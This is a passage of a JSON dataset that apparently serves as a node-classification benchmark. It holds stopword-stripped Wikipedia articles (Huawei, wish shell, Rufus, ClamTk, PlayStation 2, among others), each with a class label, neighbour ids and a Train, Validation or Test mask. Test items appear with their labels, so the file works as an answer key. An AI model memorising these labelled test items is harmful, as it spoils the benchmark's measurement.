controlled huawei said dealing iran contrary sanctions none allegations proven court 11 december 2018 meng released bail 28 january 2019 u.s. federal prosecutors formally indicted meng huawei thirteen counts bank wire fraud order mask sale u.s. technology iran illegal sanctions obstruction justice misappropriating trade secrets department also filed formal extradition request meng canadian authorities day huawei responded charges said denies subsidiary affiliate committed asserted violations well asserted meng similarly innocent china ministry industry information technology believed charges brought united states unfair august 2018 national defense authorization act fiscal year 2019 ndaa 2019 signed law containing provision banned huawei zte equipment used u.s. federal government citing security concerns huawei filed lawsuit act march 2019 alleging unconstitutional specifically targeted huawei without granting chance provide rebuttal due process 15 may 2019 department commerce added huawei 70 foreign subsidiaries affiliates entity list export administration regulations citing company indicted knowingly willfully causing export re-export sale supply directly indirectly goods technology services banking financial services united states iran government iran without obtaining license department treasury office foreign assets control ofac restricts u.s. companies business huawei without government license various u.s.-based companies immediately froze business huawei comply regulation including google—which removes ability certify future devices updates android operating system licensed google mobile services gms google play store well broadcom intel qualcomm microsoft xilinx western digital german chipmaker infineon technologies also voluntarily suspended business huawei pending assessments reported huawei limited stockpile u.s.-sourced parts obtained prior sanctions 17 may 2019 huawei voluntarily suspended membership jedec temporary measure restrictions imposed u.s. government removed speaking chinese media huawei founder ren zhengfei accused u.s. politicians underestimating company strength explained terms 5g technologies others wo n't able catch huawei two three years sacrificed families ideal stand top world reach ideal sooner later conflict us kevin wolf international trade lawyer former assistant secretary commerce export administration obama administration argued huawei could even use open source android open source project aosp code could fall u.s. trade regulations technology u.s. origin google majority developer china normal android phones including huawei include google play store gms google business region phones typically bundled aosp-based distribution built around oem software suite including either first-party app store run oem huawei appgallery third-party service google issued statement assuring user access google play existing huawei devices would disrupted huawei made similar pledge continued support existing devices including security patches make statements regarding availability future android versions upcoming android q 19 may 2019 department commerce granted huawei temporary three-month license continue business u.s. companies purposes maintaining existing smartphone telecom products without interruption whilst long-term solutions determined 22 may 2019 arm holdings also suspended business huawei including active contracts support entitlements pending engagements although japanese-owned company based uk arm cited intellectual property contained technologies u.s. origin believed covered department commerce order prevents huawei manufacturing chips use arm architecture also reported several asian wireless carriers including japan softbank kddi taiwan chunghwa telecom taiwan mobile suspended sale upcoming huawei devices p30 lite citing uncertainties effects u.s. sanctions availability android platform ntt docomo similarly suspended pre-orders new huawei phones without citing reasoning 23 may 2019 reported sd association removed huawei list members—implicating revocation membership association day toshiba briefly suspended shipments huawei temporary measure determining whether selling u.s. made components technologies huawei panasonic also stated determined business relationship compliance u.s. law would suspend next day wi-fi alliance also temporarily restricted huawei membership 24 may 2019 huawei told reuters fedex attempted divert two packages sent japan addressed huawei china united states tried divert two packages sent vietnam huawei offices elsewhere asia without authorization first fedex china claimed media reports true may 28 however apologized chinese social media account fact small number huawei shipments misrouted claimed external parties require fedex ship shipments 29 may 2019 reported huawei listed member jedec sd association wi-fi alliance addition science organization ieee initially banned huawei employees peer-reviewing papers handling papers editors may 30th 2019 citing legal concerns ban also revoked june 3rd 2019 29 june 2019 g20 summit trump chinese president general secretary xi jinping agreed resume trade negotiations trump made statements implicating plans ease restrictions u.s. companies business huawei explaining sold tremendous amount products company exactly happy could n't sell referring equipment great national security problem bbc news considered move significant concession sanctions noted huawei working in-house operating system codenamed hongmeng os interview die welt executive richard yu stated in-house os could used plan b prevented using android windows result u.s. action would prefer work ecosystems google microsoft efforts develop in-house os huawei date back far 2012 huawei filed trademarks names ark ark os harmony europe speculated connected os june 2019 huawei communications vp andrew williamson told reuters company testing hongmeng china could ready months however july 2019 chairman liang hua senior vice president catherine chen stated hongmeng os actually intended mobile operating system smartphones actually embedded operating system designed internet things iot hardware huawei classifies collective entity prior 2019 refer private company richard mcgregor author said definitional distinction essential company receipt state support crucial points development mcgregor argued huawei status genuine collective doubtful huawei position shifted 2019 dr. song liuping huawei chief legal officer commented us government ban said politicians us using strength entire nation come private company emphasis added ren zhengfei founder ceo huawei power veto decisions made board directors huawei disclosed list board directors first time 2010 liang hua current chair board members board liang hua guo ping xu zhijun hu houkun meng wanzhou cfo deputy chairwoman currently bail vancouver arrested december 1 2018 extradition request us authorities suspicion iran sanctions evasion ding yun yu chengdong wang tao xu wenwei chen lifang peng zhongyang tingbo li yingtao ren zhengfei yao fuhai tao jingwen yan lida guo ping chairman huawei device huawei mobile phone division huawei ’ chief ethics compliance officer zhou daiqi also huawei ’ communist party committee secretary chief legal officer song liuping huawei maintains employee-owned company ren zhengfei retains approximately 1 percent shares huawei holding company huawei investment holding remainder shares held trade union committee trade union per se internal governance procedures committee members leaders selected remain unknown claimed representative huawei employee shareholders company trade union committee registered pay dues shenzhen federation all-china federation trade unions also due limitation chinese law preventing limited liability companies 50 shareholders half huawei staff participate scheme foreign employees eligible hold company calls virtual restricted shares shares nontradable allocated reward performance employees leave huawei shares revert company compensates holding although employee shareholders receive dividends shares entitle direct influence management decisions enables vote members 115-person representatives ’ commission preselected list candidates representatives ’ commission selects huawei holding board directors board supervisors scholars found stages historical morphing employees part huawei “ shares ” instead “ virtual stock contract right property right gives holder voting power either huawei tech huawei holding transferred cancelled employee leaves firm subject redemption payment huawei holding tuc low fixed price ” debate whether trade union committee structure enabling government people republic china influence huawei chinese company trade unions report senior trade union organizations turn report all-china federation trade unions controlled communist party china therefore academics considered huawei owned controlled chinese government also argued huawei much state owned enterprise party owned enterprise approximately 80 world top 50 telecoms companies worked huawei prominent partners include since 2016 german camera company leica established partnership huawei leica cameras co-engineered huawei smartphones including p mate series first smartphone co-engineered leica camera huawei p9 huawei organized around three core business segments huawei announced enterprise business january 2011 provide network infrastructure fixed wireless communication data center cloud computing solutions global telecommunications customers huawei core network solutions offer mobile fixed softswitches plus next-generation home location register internet protocol multimedia subsystems ims huawei sells xdsl passive optical network pon next-generation pon ng pon single platform company also offers mobile infrastructure broadband access service provider routers switches sprs huawei software products include service delivery platforms sdps bsss rich communication suite digital home mobile office solutions huawei global services provides telecommunications operators equipment build operate networks well consulting engineering services improve operational efficiencies include network integration services mobile fixed networks assurance services network safety learning services competency consulting huawei devices division provides white-label products content-service providers including usb modems wireless modems wireless routers mobile wi-fi embedded modules fixed wireless terminals wireless gateways set-top boxes mobile handsets video products huawei also produces sells variety devices name ideos smartphones tablet pcs huawei smartwatch july 2003 huawei established handset department 2004 huawei shipped first phone c300 u626 huawei first 3g phone june 2005 2006 huawei launched first vodafone-branded 3g handset v710 u8220 huawei first android smartphone unveiled mwc 2009 ces 2012 huawei introduced ascend range starting ascend p1 s. mwc 2012 huawei launched ascend d1 september 2012 huawei launched first 4g ready phone ascend p1 lte ces 2013 huawei launched ascend d2 ascend mate mwc 2013 ascend p2 launched world first lte cat4 smartphone june 2013 huawei launched ascend p6 december 2013 huawei introduced honor subsidiary independent brand china ces 2014 huawei launched ascend mate2 4g 2014 mwc 2014 huawei launched mediapad x1 tablet ascend g6 4g smartphone launched 2014 included ascend p7 may 2014 ascend mate7 ascend g7 ascend p7 sapphire edition china first 4g smartphone sapphire screen january 2015 huawei discontinued ascend brand flagship phones launched new p series huawei p8 huawei also partnered google build nexus 6p 2015 current models p mate lines p30 p30 pro mate 20 mate 20 pro mate 20 x released 2018 2019 emotion ui emui rom/os developed huawei technologies co. ltd. based google android open source project aosp emui pre-installed huawei smartphone devices subsidiaries honor series huawei technologies co. ltd. world largest telecom equipment maker china largest telephone-network equipment maker 3,442 patents huawei became world 1 applicant international patents 2014 21 r institutes countries including china united states canada united kingdom pakistan finland france belgium germany colombia sweden ireland india russia israel turkey huawei considering opening new research development r center russia 2019/2020 would third country moscow st. petersburg r centers huawei also announced plans november 2018 open r center french city grenoble would mainly focused smartphone sensors parallel computing software development new r team grenoble expected grow 30 researchers 2020 said company company said new addition brought five number r teams country two located sophia antipolis paris researching image processing design two existing teams based huawei facilities boulogne-billancourt working algorithms mobile 5g standards technology giant also intended open two new research centers zürich lausanne switzerland huawei time employed around 350 people switzerland huawei faced criticism various aspects operations prominent controversies involved u.s. allegations products containing backdoors chinese government espionage—consistent domestic laws requiring chinese citizens companies cooperate state intelligence warranted huawei executives consistently denied allegations stated company never received requests chinese government introduce backdoors equipment would refuse chinese law compel huawei also accused various instances intellectual property theft parties nortel cisco systems t-mobile us huawei employee photographed robotic arm used stress-test smartphones taken fingertip robot",
    "neighbors": [
      4611,
      9732,
      6,
      2057,
      8719,
      11282,
      3605,
      9237,
      4124,
      3117,
      8237,
      1083,
      9279,
      5185,
      9793,
      7751,
      8794,
      97,
      1121,
      4194,
      1638,
      107,
      1650,
      9851,
      11391,
      9863,
      5262,
      1169,
      10393,
      7835,
      4259,
      8355,
      172,
      5293,
      10417,
      6834,
      2235,
      10433,
      196,
      710,
      5322,
      4816,
      2259,
      10451,
      7893,
      8921,
      9949,
      2788,
      1255,
      9964,
      3323,
      2825,
      8975,
      6416,
      1814,
      4890,
      4891,
      9498,
      798,
      1832,
      10537,
      2862,
      11588,
      6981,
      5959,
      11082,
      5963,
      11086,
      9048,
      5467,
      2910,
      1377,
      9569,
      10600,
      4463,
      6000,
      11631,
      6514,
      6003,
      1400,
      8581,
      3978,
      6539,
      5523,
      410,
      7068,
      5028,
      424,
      4011,
      9137,
      3511,
      10173,
      4039,
      9179,
      5613,
      8698
    ],
    "mask": "Train"
  },
  {
    "node_id": 10304,
    "label": 2,
    "text": "Wish_(Unix_shell):wish unix shell wish windowing shell tcl interpreter extended tk commands available unix-like operating systems x window system macos microsoft windows android provides developers facility create gui widgets using tk toolkit tcl programming language wish open-source currently part tcl/tk programming suite codice_1 run without parameters codice_2 prompt displayed interpreter awaits commands entered interactively user empty window opened widgets created user commands displayed mode suitable experimenting often codice_1 run name file containing tcl/tk script parameter also possible run directly tcl/tk scripts unix using shebang construction windows associating codice_4 extension wish program",
    "neighbors": [
      8675,
      2181,
      5612,
      6797,
      7983,
      11632,
      7346,
      11442,
      5492,
      5397,
      692,
      4859
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10305,
    "label": 4,
    "text": "William_B._Black_Jr.:william b black jr. william bolding black jr. born august 25 1936 former deputy director national security agency black joined national security agency 1959 operational linguist/analyst three years army employed nsa black completed wide variety assignments including special assistant director information warfare chief group operations analysis chief nsa/css representative europe office nceur associate deputy director operations/ military support served chief deputy chief major field installation worked way senior cryptologic executive service primary focus building new organizations creating new ways business black retired nsa 1997 1997 black became assistant vice president director information operations advanced technologies solutions group science applications international corporation saic saic black led information operations research worked information operations technology center establish institute analysis complex systems develop advanced techniques analysis networks critical infrastructures black returned nsa 2000 become deputy director since 2002 overseeing trailblazer project aimed analyzing data computer networks tracking cell phone email communications 2002 main contract trailblazer ultimately worth us 1.2 billion awarded black former employer science applications international corporation april 2005 outgoing nsa director michael hayden told senate hearing trailblazer program several hundred million dollars budget years behind schedule michael hayden promotion deputy director national intelligence black acting director nsa appointment new nsa director lt. gen. keith b. alexander august 2006 black replaced john c. inglis offered take position liaison officer nsa british intelligence counterpart native new mexico black currently resides pasadena maryland wife iris three children 1975 mr. black served various positions nsa headquarters nsa european headquarters pentagon",
    "neighbors": [
      266,
      6668,
      9357,
      2712,
      289,
      4898,
      11302,
      1714,
      327,
      7759,
      7887,
      2897,
      10832,
      4566,
      6749,
      7137,
      3305,
      365,
      4719
    ],
    "mask": "Test"
  },
  {
    "node_id": 10306,
    "label": 2,
    "text": "Rufus_(software):rufus software rufus free open-source portable application microsoft windows used format create bootable usb flash drives live usbs developed pete batard akeo consulting rufus originally designed modern open source replacement hp usb disk storage format tool windows primarily used create dos bootable usb flash drives first official release rufus version 1.0.3 earlier versions internal/alpha released december 11 2011 originally ms-dos support version 1.0.4 introduced freedos support version 1.1.0 introduced iso image support 1.2.0 two separate versions provided one ms-dos one freedos uefi boot support introduced version 1.3.2 localization 1.4.0 windows go 2.0 last version compatible windows xp vista 2.18 rufus supports variety bootable .iso files including various linux distributions windows installation .iso files well raw disk image files including compressed ones needed install bootloader syslinux grub onto flash drive render bootable also allows installation ms-dos freedos onto flash drive well creation windows go bootable media supports formatting flash drives fat fat32 ntfs exfat udf refs filesystems rufus also used compute md5 sha-1 sha-256 hashes currently selected image",
    "neighbors": [
      9377,
      4637,
      292,
      9420,
      6797,
      6062,
      7983,
      9166,
      2193,
      3834,
      6012,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10307,
    "label": 4,
    "text": "Certified_Information_Systems_Security_Professional:certified information systems security professional certified information systems security professional cissp independent information security certification granted international information system security certification consortium also known isc ² december 31 2018 131,180 isc ² members holding cissp certification worldwide 171 countries united states holding highest member count 84,557 members cissp designation accredited ansi also formally approved u.s. department defense dod information assurance technical iat managerial iam categories dodd 8570 certification requirement mid-1980s need arose standardized vendor-neutral certification program provided structure demonstrated competence november 1988 special interest group computer security sig-cs member data processing management association dpma brought together several organizations interested goal international information systems security certification consortium isc ² formed mid-1989 non-profit organization 1990 first working committee establish common body knowledge cbk formed first version cbk finalized 1992 cissp credential launched 1994 2003 cissp adopted baseline u.s. national security agency issep program cissp curriculum covers subject matter variety information security topics cissp examination based isc ² terms common body knowledge cbk according isc ² cissp cbk taxonomy – collection topics relevant information security professionals around world cissp cbk establishes common framework information security terms principles allow information security professionals worldwide discuss debate resolve matters pertaining profession common understanding 15 april 2018 cissp curriculum updated follows 2015 early 2018 cissp curriculum divided eight domains similar latest curriculum domain changed name security engineering 2018 revision expanded security architecture engineering 2015 covered ten similar domains number cissp members december 31 2018 holders cissp certifications earn additional certifications areas specialty three possibilities standard exam costs 699 usd 650 eur 2019 cissp credential valid three years holders renew submitting continuing professional education cpe credits also yearly membership fee required maintain certification fee increased nearly 50 starting mid-2019 2005 certification magazine surveyed 35,167 professionals 170 countries compensation found cissps led list certificates ranked salary 2006 certification magazine salary survey also ranked cissp credential highly ranked cissp concentration certifications top best-paid credentials 2008 another study came conclusion professionals cissp major security certifications least 5 years experience tend salaries around us us 26 higher professionals similar experience levels certificates note actual cause-and-effect relationship certificate salaries remains unproven 2017 study cybersecuritydegrees.com surveyed 10,000 current historical cyber security job listings preferred candidates holding cissp certifications cybersecuritydegrees found job openings offered average salary average cyber security salary ansi certifies cissp meets requirements ansi/iso/iec standard 17024 personnel certification accreditation program",
    "neighbors": [
      10372,
      9607,
      8462,
      5010,
      1182,
      1312,
      8613,
      6834,
      316,
      8381,
      7887,
      10322,
      10196,
      1493,
      6105,
      10717,
      10718,
      357,
      3447,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 10308,
    "label": 4,
    "text": "ClamTk:clamtk clamtk free software graphical interface clamav command line antivirus software program linux desktop users provides on-demand scheduled scanning project started dave mauroni february 2004 remains development clamtk originally written using tk widget toolkit named later re-written perl using gtk toolkit interface evolved considerably time recent versions quite different early releases adding features changing interface presentation dual-licensed gnu general public license version 1 later artistic license clamtk interface allows scanning single files directories configured recursive scans scanning sub-directories whitelists scan potentially unwanted applications puas exclude hidden files large files 20 mb 2017 ghacks reviewer mike turcotte-mccusker noted high rate false positives pua-inclusive scans return history selection allows reviewing results previous scans quarantined files clamtk allows manual automatic updates configured clamav virus definitions application interfaces thunar-sendto-clamtk nemo-sendto-clamtk clamtk-gnome clamtk-kde provide context menu functionality associated file managers thunar nemo gnome files dolphin allowing users directly send files clamtk scanning clamtk also run command-line interface although main reason command line access exists interface various file managers clamtk included repositories many linux distributions including alt linux arch linux centos debian fedora gentoo linux mint mandriva opensuse pclinuxos red hat enterprise linux ubuntu well freebsd users install clamtk repositories linux distribution using application website also provides downloads latest release versions form .rpm .deb files 2014 review clamtk 5.0.7 silviu stahie softpedia recommended application means getting clamav functionality easy-to-use graphical interface wrote basically functions clamtk performed terminal clamav would fine desktop environment like server reason use terminal regular linux distribution 2015 review bill toulas forge noted clamtk seemed take comparable amount time scan clamav indicting n't slowing scanning engine 2017 review linux ubuntu said clamtk provides simple gui allows beginners comfortable use cli upon launching clamtk presented clean gui 4 main sections 2018 listing mangesh dhulap top 10 best free linux antivirus programs – reviewed smart tricks listed clamtk first choice free linux antivirus programs ubuntu pit listing best linux antivirus top 10 reviewed compared clamtk recommended average users described lightweight 2019 review make tech easier included clamtk review best antivirus programs ubuntu reported need good virus scanner ’ fan command line clamtk best choice rewiew derrik diener additive tips 2019 stated ... like features clamav tool dislike dealing command-line ’ get useful features nice easy-to-use interface ... clamtk takes advanced clamav features command-line wraps incredibly simple user interface average linux user use",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      8582,
      1417,
      3981,
      6797,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      7983,
      6834,
      4403,
      9523,
      10166,
      823,
      7103,
      704,
      9537,
      7362,
      4421,
      202,
      1355,
      5069,
      10574,
      10192,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      7913,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 10309,
    "label": 4,
    "text": "List_of_cyber_attack_threat_trends:list cyber attack threat trends list cyber attack threat trends presented alphabetical order methods used 1990s 2015",
    "neighbors": [
      7553,
      3843,
      10756,
      8206,
      9102,
      7441,
      3218,
      4883,
      2330,
      9242,
      8478,
      9145,
      4672,
      4163,
      2887,
      6091,
      3789,
      4304,
      2902,
      87,
      9688,
      11621,
      9460,
      1781,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 10310,
    "label": 3,
    "text": "Windows_NT_processor_scheduling:windows nt processor scheduling windows nt processor scheduling refers process windows nt determines job task run computer processor time without scheduling processor would give attention jobs based arrived queue usually optimal part scheduling processor gives priority level different processes running machine two processes requesting service time processor performs jobs one higher priority six named priority levels levels associated numbers applications start base priority level eight system dynamically adjusts priority level give applications access processor priority levels 0 15 used dynamic applications priority levels 16- 31 reserved real-time applications multiprocessing environment one logical processor i.e multiple cores hyperthreading one task running time however process thread set run subset available logical processors windows task manager utility offers user interface process level",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      5300,
      2749,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      1776,
      10993,
      3834,
      8959,
      1791,
      11519,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      4458,
      6506,
      9593,
      2943,
      1418,
      5003,
      5004,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10311,
    "label": 1,
    "text": "European_Sleep_Apnea_Database:european sleep apnea database european sleep apnea database esada also referred spelling european sleep apnoea database european sleep apnoea cohort collaboration european sleep centres part european cooperation science technology cost action b 26 main contractor project sahlgrenska academy gothenburg university institute medicine department internal medicine co-ordinator jan hedner md phd professor sleep medicine book clinical genomics practical applications adult patient care said esada example initiatives afford excellent opportunity future collaborative research genetic aspects obstructive sleep apnea syndrome osas european respiratory society european sleep research society noted impact research cooperative efforts database resource 2006 european sleep apnea database esada began initiative 27 european sleep study facilities combine information compile one shared resource formed part european cooperation science technology cost action b 26 addition financial help cost initiative received assistance companies philips respironics resmed database storing association resource information located gothenburg sweden group goal twofold serve reference guide researching sleep disorders compile information different caregivers treat patients suffering sleep apnea 5,103 patients tracked march 2007 august 2009 data collected patients included symptoms suffered medication medical history sleep data inputted online format analysis database researchers reported methodology results 2010 american thoracic society observed findings regarding percentages metabolic cardiovascular changes related patients obstructive sleep apnea 2010 research resulted collaboration 22 study centres across 16 countries europe involving 27 researchers primary participants presented american thoracic society included researchers sahlgrenska university hospital gothenburg sweden technion – israel institute technology haifa israel national tb lung diseases research institute warsaw poland cnr institute biomedicine molecular palermo italy instituto auxologico italiano ospedale san luca milan italy st. vincent university hospital dublin ireland analysis published 2010 american journal respiratory critical care medicine 2011 22 sleep disorder centres europe involved collaboration group published research 2011 analyzing percentage patients suffering sleep apnea obesity 2012 database maintained information 12,500 patients europe also contained dna samples 2,600 individuals esada represented 2012 21st annual meeting european sleep research society paris france one four european sleep research networks held session event pierre escourrou fadia jilwan wrote 2012 article european respiratory journal studying data esada involving 8,228 total patients 23 different facilities analyzed whether polysomnography good measure hypopnea sleep apnea researchers department pulmonary diseases turku university hospital turku finland compared variations sleep centres esada database published findings european respiratory journal looked traits 5,103 patients 22 centres reported average age patients database prevalence region performing sleep study cardiorespiratory polygraphy database added centre hamburg germany 2013 managed physician holger hein group annual meeting 2013 held edinburgh united kingdom run renata riha march 2013 approximately 13,000 total patients studied program 200 additional patients added database month analysis published researchers italy sweden september 2013 european respiratory journal analyzed correlation renal function problems obstructive sleep apnea analyzed data 17 countries europe representing 24 sleep centres 8,112 total patients tested whether patients different types demographics existing health problems change probability kidney function problems concurrently suffered obstructive sleep apnea 2014 researchers released data studying 5,294 patients database compared prevalence sleep apnea increased blood sugar results published european respiratory journal studied glycated hemoglobin levels patients compared measured severity sleep apnea researchers analyzed glycated hemoglobin levels among class individuals less severe sleep apnea higher determined amount sleep apnea problems 20 march 2014 database included information total 15,956 patients 2014 article european respiratory journal drawing esada analyzed whether lack adequate oxygen night sleep indicator high blood pressure 2013 book clinical genomics practical applications adult patient care esada said example kind initiative affords excellent opportunity future collaborative research genetic aspects obstructive sleep apnea syndrome osas european respiratory society european sleep research society noted impact research cooperative efforts database resource",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10312,
    "label": 3,
    "text": "The_Sacred_Armour_of_Antiriad:sacred armour antiriad sacred armour antiriad action game published palace software september 1986 amstrad cpc commodore 64 ibm pc compatibles trs-80 zx spectrum north america game published epyx rad warrior original game came 16-page comic book created graphic artist daniel malone game one earliest examples metroidvania genre developed without knowledge concurrently metroid sacred armour antiriad mixture platform maze game player controls tal start simply man dressed loincloth thrown rocks weapon later find legendary antiriad armour wear activate status panel bottom screen shows tal suit strength remaining lives in-game messages among things game-environment full dangerous creatures minions mysterious overlords tal defend hostile beings throwing rocks suit using suits beam-weapon capabilities located installed necessary equipment antiriad armour tal also needs find collect additions armour order allow fly shoot etc tal use suit explore game area occasionally need leave collect power re-charges suit come too-much attack suit destroyed power depleted 2086 civilization destroys nuclear armageddon two factions develop anti-radiation battlesuit completely immune conventional weapons go war diplomatic peace talks break following millennia survivors develop hardy peaceful race living quiet agricultural existence one day mysterious alien forces emerge old volcano containing prewar military base attack quickly conquering enslaving new breed humans forcing populace work mines many rebel mysterious overlords one rebels tal instructed elders seek-out legendary armoured suit sacred armour antiriad last word corruption anti-radiation fact one prewar battlesuits whose development originally instigated diplomatic crisis started nuclear war armour rumoured render wearer impervious attack help tal hopes defeat overthrow alien rulers earth however armour requires equipment added order make function fully include anti-gravity boots particle negator pulsar beam implosion mine last add-on important one needed destroy volcano enemy uses base",
    "neighbors": [
      6129,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10313,
    "label": 8,
    "text": "Search/Retrieve_Web_Service:search/retrieve web service search/retrieve web service srw web service search retrieval srw provides soap interface queries augment url interface provided companion protocol search/retrieve via url sru queries sru srw expressed using contextual query language cql standards srw sru cql promulgated united states library congress",
    "neighbors": [
      10020,
      3979,
      140,
      2318,
      8046,
      113,
      119,
      10486,
      3191,
      8440,
      8639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10314,
    "label": 6,
    "text": "Fdupes:fdupes fdupes program written adrián lópez scan directories duplicate files options list delete replace files hardlinks pointing duplicate first compares file sizes partial md5 signatures full md5 signatures performs byte-by-byte comparison verification fdupes written c released mit license",
    "neighbors": [
      2432,
      3522,
      1844,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10315,
    "label": 4,
    "text": "Distinguishing_attack:distinguishing attack cryptography distinguishing attack form cryptanalysis data encrypted cipher allows attacker distinguish encrypted data random data modern symmetric-key ciphers specifically designed immune attack words modern encryption schemes pseudorandom permutations designed ciphertext indistinguishability algorithm found distinguish output random faster brute force search considered break cipher similar concept known-key distinguishing attack whereby attacker knows key find structural property cipher transformation plaintext ciphertext random prove cryptographic function safe often compared random oracle function would random oracle attacker able predict output function function distinguishable random oracle non-random properties exists relation different outputs input output used attacker example find part input example let sequence random bits generated random oracle sequence generated pseudo-random bit generator two parties use one encryption system encrypt message length n bitwise xor next n bits respectively output encryption using truly random sequence distinguished output encryption appear random well sequence distinguishable encryption may reveal information m. two systems said indistinguishable exists algorithm connected either able decide whether connected t. distinguishing attack given algorithm d. broadly attack attacker given black box containing either instance system attack unknown key random object domain system aims emulate algorithm able tell whether system random object black box one attack example distinguishing attack stream cipher rc4 might one determines whether given stream bytes random generated rc4 unknown key classic examples distinguishing attack popular stream cipher itsik mantin adi shamir showed 2nd output byte rc4 heavily biased toward zero another example souradyuti paul bart preneel cosic shown xor value 1st 2nd outputs rc4 also non-uniform significantly theoretical biases demonstrable computer simulation",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 10316,
    "label": 3,
    "text": "PlayStation_2:playstation 2 playstation 2 officially abbreviated ps2 home video game console developed marketed sony computer entertainment first released japan march 4 2000 north america october 26 2000 europe australia november 2000 successor playstation well second video game console playstation brand sixth-generation console ps2 competed sega dreamcast nintendo gamecube microsoft xbox announced 1999 ps2 offered backwards compatibility predecessor dualshock controller well games ps2 best-selling video game console time sold 159 million units estimated ign 150 million confirmed sony 2011 3,800 game titles released ps2 since launch 1.5 billion copies sold sony later manufactured several smaller lighter revisions console known slimline models 2004 2006 sony announced launched successor playstation 3 even release successor ps2 remained popular well seventh generation continued produced january 4 2013 sony finally announced discontinued twelve years production – one longest lifespans video game console despite announcement new games console continued produced end 2013 including final fantasy xi seekers adoulin japan fifa 13 north america pro evolution soccer 2014 europe repair services system japan ended september 7 2018 though sony kept details playstation 2 development secret work console began around time original playstation released late 1994 insiders stated developed u.s. west coast former members argonaut software 1997 word leaked press console would backwards compatibility original playstation built-in dvd player internet connectivity sony announced playstation 2 ps2 march 1 1999 video game console positioned competitor sega dreamcast first sixth-generation console released although ultimately main rivals ps2 nintendo gamecube microsoft xbox dreamcast launched successfully north america later year selling 500,000 units within two weeks soon dreamcast north american launch sony unveiled playstation 2 tokyo game show september 20 1999 sony showed fully playable demos upcoming playstation 2 games including gran turismo 2000 later released tekken tag tournament showed console graphic abilities power ps2 launched march 2000 japan october north america november europe sales console games accessories pulled 250 million first day beating 97 million made first day dreamcast directly release difficult find ps2 units retailer shelves due manufacturing delays another option purchasing console online auction websites ebay people paid thousand dollars console ps2 initially sold well partly basis strength playstation brand console backward compatibility selling 980,000 units japan march 5 2000 one day launch allowed ps2 tap large install base established playstation another major selling point competition later sony added new development kits game developers ps2 units consumers ps2 built-in functionality also expanded audience beyond gamer debut pricing less standalone dvd player made console low cost entry home theater market success ps2 end 2000 caused sega problems financially competitively sega announced discontinuation dreamcast march 2001 18 months successful western launch despite dreamcast still received support 2001 ps2 remained sixth generation console eye future 6 months would face competition new rivals form nintendo gamecube microsoft xbox many analysts predicted close three-way matchup among three consoles xbox powerful hardware gamecube least expensive console nintendo changed policy encourage third-party developers playstation 2 theoretically weakest specification three head start due installed base plus strong developer commitment well built-in dvd player xbox required adapter gamecube lacked support entirely playstation 2 initial games lineup considered mediocre changed 2001 holiday season release several blockbuster games maintained ps2 sales momentum held newer rivals sony also countered xbox temporarily securing playstation 2 exclusives highly anticipated games grand theft auto series sony cut price console may 2002 us 299 199 north america making price gamecube 100 less xbox also planned cut price japan around time cut price twice japan 2003 2006 sony cut cost console anticipation release playstation 3 sony unlike sega dreamcast originally placed little emphasis online gaming first years although changed upon launch online-capable xbox coinciding release xbox live sony released playstation network adapter late 2002 several online first–party titles released alongside demonstrate active support internet play sony also advertised heavily online model support electronic arts ea ea offer online xbox titles 2004 although sony nintendo started late although followed decentralized model online gaming responsibility developer provide servers sony moves made online gaming major selling point ps2 september 2004 time launch sony revealed newer slimmer ps2 preparation launch new models scph-700xx-9000x sony stopped making older models scph-3000x-500xx let distribution channel empty stock units apparent manufacturing issue sony reportedly underestimated demand caused initial slowdown producing new unit caused part shortages time old units cleared new units ready issue compounded britain russian oil tanker became stuck suez canal blocking ship china carrying ps2s bound uk one week november british sales totalled 6,000 units compared 70,000 units weeks prior shortages 1,700 stores north america day christmas playstation 2 software distributed cd-rom dvd-rom addition console play audio cds dvd movies backwards compatible playstation games ps2 also supports playstation memory cards controllers although original playstation memory cards work original playstation games controllers may support functions analog buttons ps2 games standard playstation 2 memory card 8 mb capacity variety non-sony manufactured memory cards available playstation 2 allowing memory capacity larger standard 8 mb console also features 2 usb ports 1 ieee 1394 firewire port scph-10000 3900x hard disk drive installed expansion bay back console required play certain games notably popular final fantasy xi available certain models hardware uses emotion engine cpu custom-designed processor based mips architecture floating point performance 6.2 gflops custom-designed graphics synthesizer gpu fillrate 2.4 gigapixels/second capable rendering 75 million polygons per second accounting features lighting texture mapping artificial intelligence game physics real-world performance 3 million 16 million polygons per 